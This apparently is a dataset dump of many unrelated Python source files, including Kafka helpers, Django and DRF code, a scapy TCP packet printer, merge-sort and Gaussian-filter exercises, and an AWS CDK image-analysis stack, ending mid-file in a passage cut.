# output is a csv file in data/mofidied/wrk_ionfile_blastn_out.csv
|
24,618 | 8e06dc2b535aec230142c3a497e717f0da6b8b84 |
'''
The script contains CR (carriage return) characters.
The shell interprets these CR characters as arguments.
Solution: Remove the CR characters from the script using the following script.
Why this happened: Windows use CR, LF for line ending.
Need to change back to LF for Unix
The other way to solve this:
Open the file in vim or vi, and administer the following command:
:set ff=unix
Save and exit:
:wq
Done!
Explanation
ff stands for file format, and can accept the values of unix (\n), dos (\r\n) and mac (\r) (only meant to be used on pre-intel macs, on modern macs use unix).
To read more about the ff command:
:help ff
:wq stands for Write and Quit, a faster equivalent is Shift+zz (i.e. hold down Shift then press z twice).
'''
with open('hello.py', 'rb+') as f:
content = f.read()
f.seek(0)
f.write(content.replace(b'\r', b''))
f.truncate() |
24,619 | 56321a1cf966b721f95fe4fe26608ee2b4645a19 | import sys
import requests
from bs4 import BeautifulSoup
def trade_spider():
#k = input()
print(sys.argv[1])
# print(stra)
# url = 'https://twitter.com/SumaaaaiL'
# source_code = requests.get(url,allow_redirects=False)
# plain_text = source_code.text.encode('ascii', 'replace')
# soup = BeautifulSoup(plain_text, 'html.parser')
# for link in soup.findAll('p', {'class': 'TweetTextSize TweetTextSize--normal js-tweet-text tweet-text'}):
# title = link.string
# print(title)
trade_spider()
|
24,620 | 2fdd9a0d52f942517f6f76c7071c96908d2add31 | import os
lista = []
arq2 = open("agenda.csv", "rw")
lista = arq2.readlines()
arq2.close()
print(lista)
def menu():
print("\n", "=" * 50)
print("1 - Criar contato")
print("2 - Para excluir contato")
print("3 - Para listar contatos")
print("4 - Sair")
def lista_agenda(nome, data, opc):
if(opc==1):
contato = nome+";"+data+"\n"
lista.append(contato)
lista.sort()
print("Contato inserido com sucesso!")
os.system("sleep 1s")
if(opc==2):
tam = len(lista)
for i in range(tam):
print(i,"-",lista[i])
delete = int(input("Qual deseja apagar? "))
lista.pop(delete)
print("Registro excluido")
os.system("sleep 3s")
if(opc==3):
for i in lista:
print(i)
os.system("sleep 3s")
if(opc==4):
print("byebye")
return 0;
arq = open("agenda.csv", "w")
tam = len(lista)
for i in range(tam):
arq.write(lista[i])
arq.close()
o = 0
while True:
os.system("clear")
menu()
o = int(input("Opcao: "))
if(o==4):
break
if(o==1):
n = input("Digite um nome: ")
d = input("Digite uma data: ")
lista_agenda(n,d,1)
if(o==2):
lista_agenda(0,0,2)
if(o==3):
lista_agenda(0,0,3)
|
24,621 | 6e3d7319f0311dad25e2d894ca69fea703c4eb6a | from pykafka import KafkaClient
from tornado.options import options
def handle_request(request_topic_name, customer_group, response_topic_name):
"""
处理接入服务发送到kafka内供解析服务来处理的原始数据
"""
# 处理
request_client = KafkaClient(hosts=options.kafka_connect, use_greenlets=True)
request_topic = request_client.topics[request_topic_name]
request_consumer = request_topic.get_balanced_consumer(consumer_group=customer_group,
auto_commit_enable=True,
zookeeper_connect=options.zookeeper_connect)
# 回应
response_client = KafkaClient(hosts=options.kafka_connect, use_greenlets=True)
response_topic = response_client.topics[response_topic_name]
response_producer = response_topic.get_producer()
return request_consumer, response_producer
def transfer_raw(raw_topic_name):
"""
发送原始数据到kafka,待后续上报服务、存储服务来使用
"""
raw_client = KafkaClient(hosts=options.kafka_connect, use_greenlets=True)
raw_topic = raw_client.topics[raw_topic_name]
raw_producer = raw_topic.get_producer()
return raw_producer
|
24,622 | db828ecbcabc4a2a9cc88f333827eccd3e330948 | class Animal:
def __init__(self, name, species):
self.name = name
self.species = species
def __repr__(self):
return f"{self.name} is a {self.species}"
def make_sound(self, sound):
print(f"this animal says {sound}")
# def make_sound(self, sound):
# print(f"this animal says {sound}")
class Cat(Animal):
def __init__(self, name, breed, toy):
# Animal.__init__(self, name, species) Not common
super().__init__(name, species= "Cat")
self.species = species
self.breed = breed
self.toy = toy
def play(self):
print(f"{self.name} plays with {self.toy}")
blue = Cat()
blue.make_sound("MEOW")
print(blue.cool)
print(isinstance(blue, Animal))
print(isinstance(blue, object))
#Properties
# class Human:
# def __init__(self, first, last, age):
# self.first = first
# self.last = last
# if age >= 0:
# self._age = age
# else:
# self._age = 0
# def get_age(self):
# return self._age
# def set_age(self, new_age):
# if new_age >= 0:
# self._age = new_age
# else:
# self._age = 0
# @property
# def age(self):
# return self._age
# @age.setter
# def age(self, value):
# if value >= 0:
# self._age = value
# else:
# raise ValueError("age can't be negative")
# jane = Human("Jane", "Goodall", 50)
# print(jane.age) |
24,623 | 064f5782866a6c6dcd9e86348ec659b4a4b84ead | '''
Usage:
- sudo python receive.py -p 12345
Author:
Swapnasheel
'''
import os, sys, argparse
from scapy.all import *
def create_parser():
parser = argparse.ArgumentParser(description="To allow user to pass inputs")
parser.add_argument('-p', '--port', help="Port to sniff on", type=int, required=True)
# parser.add_argument('-i', '--iface', help="Interface to sniff on")
return parser
def handle_pkt(pkt, port):
# Filter for TCP
if TCP in pkt and pkt[TCP].dport==port:
print "Got a packet!"
pkt.show2()
sys.stdout.flush()
def Main():
# Get interface eth0 from the /sys/class/net/ directory
args = create_parser().parse_args()
iface = filter(lambda i: 'eth' in i, os.listdir('/sys/class/net/'))[0]
print "Sniffing on %s " % iface
sys.stdout.flush()
sniff(iface=iface, prn=lambda x: handle_pkt(x, args.port))
if __name__ == '__main__':
Main()
|
24,624 | eb31b5fa171a5fa243279c307a3f3a88b06bafdb | # -*- coding: utf-8 -*-#
"""
Created on 2020/7/6 16:16
@Project:
@Author: liuliang
@Email: 1258644178@qq.com
@Description:
@version: V1
"""
from typing import List
class Solution:
def __init__(self):
self.ans = 0
def reversePairs(self, nums: List[int]) -> int:
print(self.merge_sort(nums))
return self.ans
def merge_sort(self, nums):
if len(nums) <= 1:
return nums
else:
mid = len(nums) // 2
left = self.merge_sort(nums[:mid])
right = self.merge_sort(nums[mid:])
return self.merge(left, right)
def merge(self, nums1, nums2):
left = 0
right = 0
new_arr = []
while left < len(nums1) and right < len(nums2):
if nums1[left] > nums2[right]:
new_arr.append(nums2[right]) # 右边的值小
self.ans += (len(nums1) - left) # 注意坑
right += 1
else:
new_arr.append(nums1[left])
left += 1
if left < len(nums1):
new_arr.extend(nums1[left:])
if right < len(nums2):
new_arr.extend(nums2[right:])
return new_arr
class Solution:
def reversePairs(self, nums: List[int]) -> int:
self.cnt = 0
def merge(nums, start, mid, end):
i, j, temp = start, mid + 1, []
while i <= mid and j <= end:
if nums[i] <= nums[j]:
temp.append(nums[i])
i += 1
else:
self.cnt += mid - i + 1
temp.append(nums[j])
j += 1
while i <= mid:
temp.append(nums[i])
i += 1
while j <= end:
temp.append(nums[j])
j += 1
for i in range(len(temp)):
nums[start + i] = temp[i]
def mergeSort(nums, start, end):
if start >= end: return
mid = (start + end) >> 1
mergeSort(nums, start, mid)
mergeSort(nums, mid + 1, end)
merge(nums, start, mid, end)
mergeSort(nums, 0, len(nums) - 1)
return self.cnt
# class Solution():
# def mergeSort(self, nums):
#
# if len(nums) <= 1:
# return nums
# mid = len(nums) >> 1
# left = self.mergeSort(nums[:mid])
# right = self.mergeSort(nums[mid:])
# return self.merge(left, right)
#
# def merge(self, nums1, nums2):
# new_arr = []
# i, j = 0, 0
# while i < len(nums1) and j < len(nums2):
# if nums1[i] < nums2[j]:
# new_arr.append(nums1[i])
# i += 1
# else:
# new_arr.append(nums2[j])
# j += 1
#
# while i < len(nums1):
# new_arr.append(nums1[i])
# i += 1
# while j < len(nums2):
# new_arr.append(nums2[j])
# j += 1
# return new_arr
s = Solution()
ans = s.reversePairs([7, 5, 6, 4])
print(ans)
# ans = s.reversePairs([1, 3, 2, 3, 1])
print(ans)
|
24,625 | 94254250bc45b9e14fd4c9051ccb3dd0cb549add | import falcon
from mashina.config import settings
from mashina.routing import root_routes
from mashina.utils.misc import import_string
class App(falcon.API):
def add_routes(self):
for route in root_routes:
self.add_route(*route)
def get_middlewares(self):
return [import_string(middleware)() for middleware in settings.MIDDLEWARE]
def __init__(self):
super(App, self).__init__(
middleware=self.get_middlewares()
)
self.add_routes()
|
24,626 | 0b1ad00ff22d9d04a0cb9fe4183a19b3c67df6a4 | import unittest
from coinStairs import solution
class CoinStairsTest(unittest.TestCase):
def test_first(self):
input = 5
output = 2
result = solution(input)
self.assertEqual(result,output)
def test_second(self):
input = 8
output = 3
result = solution(input)
self.assertEqual(result,output)
if __name__ == '__main__':
unittest.main()
|
24,627 | 4fae9a8d34221809a76ca7ffe0ab05460de44866 | import scrapy
from kingfisher_scrapy.base_spider import IndexSpider
from kingfisher_scrapy.util import parameters
class MexicoAdministracionPublicaFederal(IndexSpider):
"""
Domain
Administración Pública Federal (APF)
Bulk download documentation
https://datos.gob.mx/busca/dataset/concentrado-de-contrataciones-abiertas-de-la-apf
"""
name = 'mexico_administracion_publica_federal'
data_type = 'record_package_list_in_results'
count_pointer = '/pagination/total'
limit = '/pagination/pageSize'
use_page = True
formatter = staticmethod(parameters('page'))
def start_requests(self):
url = 'https://api.datos.gob.mx/v1/contratacionesabiertas'
yield scrapy.Request(url, meta={'file_name': 'page-1.json'}, callback=self.parse_list)
|
24,628 | fd775283a37b0669c7d0c7686577516d98bd29d2 | #!/usr/bin/env python
import os
import matplotlib
import numpy as np
import struct
file_mmt = "momrate_LaHabra.zf.100m.rev.bin"
file_out = "mesh_src.dat"
fidout = open(file_out,'w')
fidin = open(file_mmt, 'rb')
nsrc = 1560
nt = 5000
nmom = 6
nseek = 4 * nmom * nt
for i in range(nsrc):
dat = struct.unpack('3I', fidin.read(12))
# np.savetxt(file_out, dat)
fidout.write(" ".join(str(x) for x in dat) + "\n")
fidin.seek(nseek,1)
fidin.close()
fidout.close()
|
24,629 | 515ef26beeb1f04b08b434f218c979b81706306c | # Generated by Django 2.2 on 2019-05-20 10:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Account', '0007_auto_20190416_1936'),
]
operations = [
migrations.AlterField(
model_name='extendeduser',
name='api_key',
field=models.CharField(default='SjyL2w6z7z', max_length=32, unique=True),
),
migrations.AlterField(
model_name='extendeduser',
name='restore_token',
field=models.CharField(default='TUsim3JDzkqxXTHy', max_length=32),
),
migrations.AlterField(
model_name='extendeduser',
name='secret_key',
field=models.CharField(default='O6d746CjsX', max_length=32),
),
migrations.AlterField(
model_name='extendeduser',
name='token',
field=models.CharField(default='dseHS0q2EssSFsix', max_length=32),
),
]
|
24,630 | 8e86d5c79321a4633c5d95037b3192f3891ccd65 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
word1 = u'パトカー'
word2 = u'タクシー'
for i in range(len(word2)):
sys.stdout.write(word1[i]+word2[i])
|
24,631 | 0d45cef44266f559532600de6fde3a4361c949ff | from norman.web.frontend.auth_login import AuthLoginView
from norman.web.frontend.auth_logout import AuthLogoutView
from norman.web.frontend.home import HomeView
from norman.web.frontend.farmer import OrganizationFarmerListView, OrganizationFarmerAddView
from norman.web.frontend.crops import OrganizationCropsListView
from norman.web.frontend.inventory import OrganizationInventoryView
from norman.web.frontend.orders import OrganizationOrdersView
from django.conf.urls import url
__all__ = ('urlpatterns')
urlpatterns = [
url(r'^$', HomeView.as_view(), name='norman-home'),
url(r'^auth/login/$', AuthLoginView.as_view(),
name='norman-login'),
url(r'^auth/logout/$', AuthLogoutView.as_view(),
name='norman-logout'),
url(r'^farmers/$', OrganizationFarmerListView.as_view(), name='organization-farmer-list'),
url(r'^farmers/add/$', OrganizationFarmerAddView.as_view(), name='organization-farmer-add'),
url(r'^crops/$', OrganizationCropsListView.as_view(), name='organization-crops-list'),
url(r'^inventory/$', OrganizationInventoryView.as_view(), name='organization-inventory'),
url(r'^orders/$', OrganizationOrdersView.as_view(), name='organization-orders'),
] |
24,632 | 4f50acd4b80bd82a5d720d578ac37d454a198ab8 | import boto3
import os
def main(req):
mwn = req.args['bucket'].upper()
addr = os.getenv('MWARE_' + mwn + '_ADDR')
akey = os.getenv('MWARE_' + mwn + '_S3KEY')
asec = os.getenv('MWARE_' + mwn + '_S3SEC')
s3 = boto3.session.Session().client(service_name = 's3',
aws_access_key_id = akey, aws_secret_access_key = asec, endpoint_url = 'http://' + addr + '/')
if req.args['action'] == 'put':
s3.put_object(Bucket = req.args['bucket'], Key = req.args['name'], Body = req.args['data'])
res = 'done'
elif req.args['action'] == 'get':
resp = s3.get_object(Bucket = req.args['bucket'], Key = req.args['name'])
if resp['ContentLength'] > 0:
res = resp['Body'].read().decode("utf-8")
else:
res = 'error'
else:
res = 'error'
return { "res": res }, None
|
24,633 | 5016c1336c60c177e6b929e8298174e344d5d8b1 | # -*- coding: utf-8 -*-
"""
=============
No Histograms
=============
Sometimes marginalised histograms are not needed.
"""
from numpy.random import multivariate_normal, normal, seed
import numpy as np
from chainconsumer import ChainConsumer
seed(0)
cov = normal(size=(3, 3))
data = multivariate_normal(normal(size=3), np.dot(cov, cov.T), size=100000)
c = ChainConsumer().add_chain(data)
c.configure(plot_hists=False)
fig = c.plotter.plot()
fig.set_size_inches(3 + fig.get_size_inches()) # Resize fig for doco. You don't need this.
|
24,634 | 324d46073a9ba92b714577b62cc250b376475f80 | # -*- coding:utf-8 -*-
from PIL import Image
import numpy as np
from matplotlib import pyplot as plt
# 1 dimension gaussian filter
def convolve_1d(origin, sigma):
origin = np.array(origin)
# get the size of mask
length = np.ceil(sigma*4+1).astype(np.int)
mask = np.zeros(length)
sum_norm = 0
# get gaussian function
for i in range(length):
mask[i] = np.exp(-0.5*np.square(i/sigma))
sum_norm += mask[i]*2
sum_norm -= mask[0]
# normalization
for i in range(length):
mask[i] /= sum_norm
# convolve
result = np.zeros(origin.shape)
for x in range(len(origin)):
sum_x = mask[0]*origin[x]
for i in range(1,length):
sum_x += mask[i]*origin[max(x-i, 0)] + mask[i]*origin[min(x+i, len(origin)-1)]
result[x] = sum_x
return result
def convovle_2d(origin, sigma):
origin = np.array(origin)
result = np.zeros(origin.shape)
for i in range(origin.shape[1]):
result[:, i] = convolve_1d(origin[:, i], sigma)
origin = result.T
result = origin
for i in range(origin.shape[1]):
result[:, i] = convolve_1d(origin[:, i], sigma)
return result.T
def convovle_matrix2d(origin, sigma):
origin = np.array(origin)
gaussian = [np.exp(-0.5*np.square(i/sigma)) for i in range(3)]
gaussian_matrix = np.array([[gaussian[2], gaussian[1], gaussian[2]],
[gaussian[1], gaussian[0], gaussian[1]],
[gaussian[2], gaussian[1], gaussian[2]]])
gaussian_matrix = gaussian_matrix / np.sum(gaussian_matrix)
result = np.zeros(origin.shape)
width = origin.shape[1]
height = origin.shape[0]
for x in range(height):
for y in range(width):
result[x, y] = gaussian_matrix[0, 0]*origin[max(x-1, 0), max(y-1, 0)] \
+ gaussian_matrix[0, 1]*origin[max(x-1, 0), y] \
+ gaussian_matrix[0, 2]*origin[max(x-1, 0), min(y+1, width-1)] \
+ gaussian_matrix[1, 0]*origin[x, max(y-1, 0)] \
+ gaussian_matrix[1, 1]*origin[x, y] \
+ gaussian_matrix[1, 2]*origin[x, min(y+1, width-1)] \
+ gaussian_matrix[2, 0]*origin[min(x+1, height-1), max(y-1, 0)] \
+ gaussian_matrix[2, 1]*origin[min(x+1, height-1), y] \
+ gaussian_matrix[2, 2]*origin[min(x+1, height-1), min(y+1, width-1)]
return result
def gaussian_filter():
a = [[1.0, 2.0, 3.0, 4.0, 5.0],
[1.0, 2.0, 3.0, 4.0, 5.0],
[1.0, 2.0, 3.0, 4.0, 5.0],
[1.0, 2.0, 3.0, 4.0, 5.0],
[1.0, 2.0, 3.0, 4.0, 5.0]]
# convolve 1d
print(convolve_1d(a, 0.8))
# convolve 2d with 2 1d
print(convovle_2d(a, 0.8))
# convolve 2d with mask
print(convovle_matrix2d(a, 0.8))
# filter image with 2dmask
image = np.array(Image.open("./lena.jpg"), dtype=np.float)
result = convovle_matrix2d(image, 0.8).astype(np.uint8)
plt.imshow(result)
plt.show()
gaussian_filter() |
24,635 | 53a2dd86a39ce5d8aff1379fa3b9476f14e49997 | from rest_framework import serializers
from rest_framework.validators import UniqueTogetherValidator
from posts.models import Comment, Group, Post, User, Follow
class GroupSerializer(serializers.ModelSerializer):
class Meta:
fields = '__all__'
model = Group
class CommentSerializer(serializers.ModelSerializer):
author = serializers.SlugRelatedField(
slug_field='username', read_only=True)
class Meta:
fields = '__all__'
model = Comment
read_only_fields = ['post']
class PostSerializer(serializers.ModelSerializer):
author = serializers.SlugRelatedField(
read_only=True, slug_field='username')
publication_date = serializers.SerializerMethodField(source='pub_date')
class Meta:
exclude = ('pub_date',)
model = Post
def get_publication_date(self, obj):
return obj.pub_date.date()
class UserSerializer(serializers.ModelSerializer):
posts = serializers.SlugRelatedField(slug_field='id',
many=True, read_only=True)
class Meta:
fields = ('id', 'username', 'posts')
model = User
class FollowSerializer(serializers.ModelSerializer):
user = serializers.SlugRelatedField(
read_only=True, slug_field='username',
default=serializers.CurrentUserDefault())
author = serializers.SlugRelatedField(
slug_field='username',
queryset=User.objects.all())
class Meta:
fields = ('id', 'user', 'author')
model = Follow
validators = [
UniqueTogetherValidator(
queryset=Follow.objects.all(),
fields=['user', 'author'],
)
]
def validate_author(self, value):
user = self.context['request'].user
if user == value:
raise serializers.ValidationError('На себя нельзя подписываться')
return value
|
24,636 | 67d83d9090b7081787d8bc0569a437e56076607e | from aws_cdk import (
aws_lambda as _lambda,
aws_s3_notifications as _s3notification,
aws_lambda_event_sources as _lambda_event_source,
aws_s3 as _s3,
aws_cognito as _cognito,
aws_sqs as _sqs,
aws_apigateway as _apigw,
aws_iam as _iam,
aws_events as _events,
aws_events_targets as _event_targets,
aws_ec2 as _ec2,
aws_rds as _rds,
aws_secretsmanager as _secrets_manager,
custom_resources as _custom_resources,
core
)
from aws_cdk.core import CustomResource
from aws_cdk.custom_resources import (
AwsCustomResource,
AwsCustomResourcePolicy,
AwsSdkCall,
PhysicalResourceId,
Provider
)
# read config file
# create first user of the cognito user pool?
class VaquitaStack(core.Stack):
def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:
super().__init__(scope, id, **kwargs)
### S3 core
imagesS3Bucket = _s3.Bucket(self, "VAQUITA_IMAGES")
imagesS3Bucket.add_cors_rule(
allowed_methods=[_s3.HttpMethods.POST],
allowed_origins=["*"] # add API gateway web resource URL
)
### SQS core
imageDeadletterQueue = _sqs.Queue(self, "VAQUITA_IMAGES_DEADLETTER_QUEUE")
imageQueue = _sqs.Queue(self, "VAQUITA_IMAGES_QUEUE",
dead_letter_queue={
"max_receive_count": 3,
"queue": imageDeadletterQueue
})
### api gateway core
apiGateway = _apigw.RestApi(self, 'VAQUITA_API_GATEWAY', rest_api_name='VaquitaApiGateway')
apiGatewayResource = apiGateway.root.add_resource('vaquita')
apiGatewayLandingPageResource = apiGatewayResource.add_resource('web')
apiGatewayGetSignedUrlResource = apiGatewayResource.add_resource('signedUrl')
apiGatewayImageSearchResource = apiGatewayResource.add_resource('search')
### landing page function
getLandingPageFunction = _lambda.Function(self, "VAQUITA_GET_LANDING_PAGE",
function_name="VAQUITA_GET_LANDING_PAGE",
runtime=_lambda.Runtime.PYTHON_3_7,
handler="main.handler",
code=_lambda.Code.asset("./src/landingPage"))
getLandingPageIntegration = _apigw.LambdaIntegration(
getLandingPageFunction,
proxy=True,
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': "'*'",
}
}])
apiGatewayLandingPageResource.add_method('GET', getLandingPageIntegration,
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': True,
}
}])
### cognito
required_attribute = _cognito.StandardAttribute(required=True)
usersPool = _cognito.UserPool(self, "VAQUITA_USERS_POOL",
auto_verify=_cognito.AutoVerifiedAttrs(email=True), #required for self sign-up
standard_attributes=_cognito.StandardAttributes(email=required_attribute), #required for self sign-up
self_sign_up_enabled=True)
userPoolAppClient = _cognito.CfnUserPoolClient(self, "VAQUITA_USERS_POOL_APP_CLIENT",
supported_identity_providers=["COGNITO"],
allowed_o_auth_flows=["implicit"],
allowed_o_auth_scopes=["phone", "email", "openid", "profile"],
user_pool_id=usersPool.user_pool_id,
callback_ur_ls=[apiGatewayLandingPageResource.url],
allowed_o_auth_flows_user_pool_client=True,
explicit_auth_flows=["ALLOW_REFRESH_TOKEN_AUTH"])
userPoolDomain = _cognito.UserPoolDomain(self, "VAQUITA_USERS_POOL_DOMAIN",
user_pool=usersPool,
cognito_domain=_cognito.CognitoDomainOptions(domain_prefix="vaquita"))
### get signed URL function
getSignedUrlFunction = _lambda.Function(self, "VAQUITA_GET_SIGNED_URL",
function_name="VAQUITA_GET_SIGNED_URL",
environment={"VAQUITA_IMAGES_BUCKET": imagesS3Bucket.bucket_name},
runtime=_lambda.Runtime.PYTHON_3_7,
handler="main.handler",
code=_lambda.Code.asset("./src/getSignedUrl"))
getSignedUrlIntegration = _apigw.LambdaIntegration(
getSignedUrlFunction,
proxy=True,
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': "'*'",
}
}])
apiGatewayGetSignedUrlAuthorizer = _apigw.CfnAuthorizer(self, "VAQUITA_API_GATEWAY_GET_SIGNED_URL_AUTHORIZER",
rest_api_id=apiGatewayGetSignedUrlResource.rest_api.rest_api_id,
name="VAQUITA_API_GATEWAY_GET_SIGNED_URL_AUTHORIZER",
type="COGNITO_USER_POOLS", #_apigw.AuthorizationType.COGNITO,
identity_source="method.request.header.Authorization",
provider_arns=[usersPool.user_pool_arn])
apiGatewayGetSignedUrlResource.add_method('GET', getSignedUrlIntegration,
authorization_type=_apigw.AuthorizationType.COGNITO,
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': True,
}
}]
).node.find_child('Resource').add_property_override('AuthorizerId', apiGatewayGetSignedUrlAuthorizer.ref)
imagesS3Bucket.grant_put(getSignedUrlFunction, objects_key_pattern="new/*")
### image massage function
imageMassageFunction = _lambda.Function(self, "VAQUITA_IMAGE_MASSAGE",
function_name="VAQUITA_IMAGE_MASSAGE",
timeout=core.Duration.seconds(6),
runtime=_lambda.Runtime.PYTHON_3_7,
environment={"VAQUITA_IMAGE_MASSAGE": imageQueue.queue_name},
handler="main.handler",
code=_lambda.Code.asset("./src/imageMassage"))
imagesS3Bucket.grant_write(imageMassageFunction, "processed/*")
imagesS3Bucket.grant_delete(imageMassageFunction, "new/*")
imagesS3Bucket.grant_read(imageMassageFunction, "new/*")
newImageAddedNotification = _s3notification.LambdaDestination(imageMassageFunction)
imagesS3Bucket.add_event_notification(_s3.EventType.OBJECT_CREATED,
newImageAddedNotification,
_s3.NotificationKeyFilter(prefix="new/")
)
imageQueue.grant_send_messages(imageMassageFunction)
### image analyzer function
imageAnalyzerFunction = _lambda.Function(self, "VAQUITA_IMAGE_ANALYSIS",
function_name="VAQUITA_IMAGE_ANALYSIS",
runtime=_lambda.Runtime.PYTHON_3_7,
timeout=core.Duration.seconds(10),
environment={
"VAQUITA_IMAGES_BUCKET": imagesS3Bucket.bucket_name,
"REGION": core.Aws.REGION,
},
handler="main.handler",
code=_lambda.Code.asset("./src/imageAnalysis"))
imageAnalyzerFunction.add_event_source(_lambda_event_source.SqsEventSource(queue=imageQueue, batch_size=10))
imageQueue.grant_consume_messages(imageMassageFunction)
lambda_rekognition_access = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW,
actions=["rekognition:DetectLabels", "rekognition:DetectModerationLabels"],
resources=["*"]
)
imageAnalyzerFunction.add_to_role_policy(lambda_rekognition_access)
imagesS3Bucket.grant_read(imageAnalyzerFunction, "processed/*")
### API gateway finalizing
self.add_cors_options(apiGatewayGetSignedUrlResource)
self.add_cors_options(apiGatewayLandingPageResource)
self.add_cors_options(apiGatewayImageSearchResource)
### secret manager
database_secret = _secrets_manager.Secret(self, "VAQUITA_DATABASE_SECRET",
secret_name="rds-db-credentials/vaquita-rds-secret",
generate_secret_string=_secrets_manager.SecretStringGenerator(
generate_string_key='password',
secret_string_template='{"username": "dba"}',
require_each_included_type=True
)
)
database = _rds.CfnDBCluster(self, "VAQUITA_DATABASE",
engine=_rds.DatabaseClusterEngine.aurora_mysql(version=_rds.AuroraMysqlEngineVersion.VER_5_7_12).engine_type,
engine_mode="serverless",
# availability_zones=vpc.availability_zones,
database_name="images_labels",
enable_http_endpoint=True,
deletion_protection=False,
# enable_cloudwatch_logs_exports=["error"],
master_username=database_secret.secret_value_from_json("username").to_string(),
master_user_password=database_secret.secret_value_from_json("password").to_string(),
scaling_configuration=_rds.CfnDBCluster.ScalingConfigurationProperty(
auto_pause=True,
min_capacity=2,
max_capacity=8,
seconds_until_auto_pause=1800
),
)
database_cluster_arn = "arn:aws:rds:{}:{}:cluster:{}".format(core.Aws.REGION, core.Aws.ACCOUNT_ID, database.ref)
### secret manager
secret_target = _secrets_manager.CfnSecretTargetAttachment(self,"VAQUITA_DATABASE_SECRET_TARGET",
target_type="AWS::RDS::DBCluster",
target_id=database.ref,
secret_id=database_secret.secret_arn
)
secret_target.node.add_dependency(database)
### database function
image_data_function_role = _iam.Role(self, "VAQUITA_IMAGE_DATA_FUNCTION_ROLE",
role_name="VAQUITA_IMAGE_DATA_FUNCTION_ROLE",
assumed_by=_iam.ServicePrincipal("lambda.amazonaws.com"),
managed_policies=[
_iam.ManagedPolicy.from_aws_managed_policy_name("service-role/AWSLambdaVPCAccessExecutionRole"),
_iam.ManagedPolicy.from_aws_managed_policy_name("service-role/AWSLambdaBasicExecutionRole"),
_iam.ManagedPolicy.from_aws_managed_policy_name("AmazonRDSDataFullAccess")
]
)
image_data_function = _lambda.Function(self, "VAQUITA_IMAGE_DATA",
function_name="VAQUITA_IMAGE_DATA",
runtime=_lambda.Runtime.PYTHON_3_7,
timeout=core.Duration.seconds(5),
role=image_data_function_role,
# vpc=vpc,
# vpc_subnets=_ec2.SubnetSelection(subnet_type=_ec2.SubnetType.ISOLATED),
environment={
"CLUSTER_ARN": database_cluster_arn,
"CREDENTIALS_ARN": database_secret.secret_arn,
"DB_NAME": database.database_name,
"REGION": core.Aws.REGION
},
handler="main.handler",
code=_lambda.Code.asset("./src/imageData")
)
imageSearchIntegration = _apigw.LambdaIntegration(
image_data_function,
proxy=True,
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': "'*'",
}
}])
apiGatewayImageSearchAuthorizer = _apigw.CfnAuthorizer(self, "VAQUITA_API_GATEWAY_IMAGE_SEARCH_AUTHORIZER",
rest_api_id=apiGatewayImageSearchResource.rest_api.rest_api_id,
name="VAQUITA_API_GATEWAY_IMAGE_SEARCH_AUTHORIZER",
type="COGNITO_USER_POOLS", #_apigw.AuthorizationType.COGNITO,
identity_source="method.request.header.Authorization",
provider_arns=[usersPool.user_pool_arn])
apiGatewayImageSearchResource.add_method('POST', imageSearchIntegration,
authorization_type=_apigw.AuthorizationType.COGNITO,
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Origin': True,
}
}]
).node.find_child('Resource').add_property_override('AuthorizerId', apiGatewayImageSearchAuthorizer.ref)
lambda_access_search = _iam.PolicyStatement(
effect=_iam.Effect.ALLOW,
actions=["translate:TranslateText"],
resources=["*"] #tbc [elasticSearch.attr_arn]
)
image_data_function.add_to_role_policy(lambda_access_search)
### custom resource
lambda_provider = Provider(self, 'VAQUITA_IMAGE_DATA_PROVIDER',
on_event_handler=image_data_function
)
CustomResource(self, 'VAQUITA_IMAGE_DATA_RESOURCE',
service_token=lambda_provider.service_token,
pascal_case_properties=False,
resource_type="Custom::SchemaCreation",
properties={
"source": "Cloudformation"
}
)
### event bridge
event_bus = _events.EventBus(self, "VAQUITA_IMAGE_CONTENT_BUS")
event_rule = _events.Rule(self, "VAQUITA_IMAGE_CONTENT_RULE",
rule_name="VAQUITA_IMAGE_CONTENT_RULE",
description="The event from image analyzer to store the data",
event_bus=event_bus,
event_pattern=_events.EventPattern(resources=[imageAnalyzerFunction.function_arn]),
)
event_rule.add_target(_event_targets.LambdaFunction(image_data_function))
event_bus.grant_put_events(imageAnalyzerFunction)
imageAnalyzerFunction.add_environment("EVENT_BUS", event_bus.event_bus_name)
### outputs
core.CfnOutput(self, 'CognitoHostedUILogin',
value='https://{}.auth.{}.amazoncognito.com/login?client_id={}&response_type=token&scope={}&redirect_uri={}'.format(userPoolDomain.domain_name, core.Aws.REGION, userPoolAppClient.ref, '+'.join(userPoolAppClient.allowed_o_auth_scopes), apiGatewayLandingPageResource.url),
description='The Cognito Hosted UI Login Page'
)
def add_cors_options(self, apigw_resource):
apigw_resource.add_method('OPTIONS', _apigw.MockIntegration(
integration_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Headers': "'Content-Type,X-Amz-Date,Authorization,X-Api-Key,X-Amz-Security-Token'",
'method.response.header.Access-Control-Allow-Origin': "'*'",
'method.response.header.Access-Control-Allow-Methods': "'GET,OPTIONS'"
}
}
],
passthrough_behavior=_apigw.PassthroughBehavior.WHEN_NO_MATCH,
request_templates={"application/json":"{\"statusCode\":200}"}
),
method_responses=[{
'statusCode': '200',
'responseParameters': {
'method.response.header.Access-Control-Allow-Headers': True,
'method.response.header.Access-Control-Allow-Methods': True,
'method.response.header.Access-Control-Allow-Origin': True,
}
}
],
) |
24,637 | 141222ce83427cbac1890040636bce93085ff84b | import os
class sablon:
def __init__(self):
self.ds = "a"
self.dsayi = 0
self.acilis = "section .data\n\t{}\n\nsection .text\n"
self.kapanis = "\n\tmov eax, 1\n\txor ebx, ebx\n\tint 80h\n"
self.uyku = "\n\tmov dword [saniye], {}\n\tmov dword [nanosaniye], 0\n\tmov eax, 162\n\tmov ebx, forsleep\n\tmov ecx, 0\n\tint 80h\n"
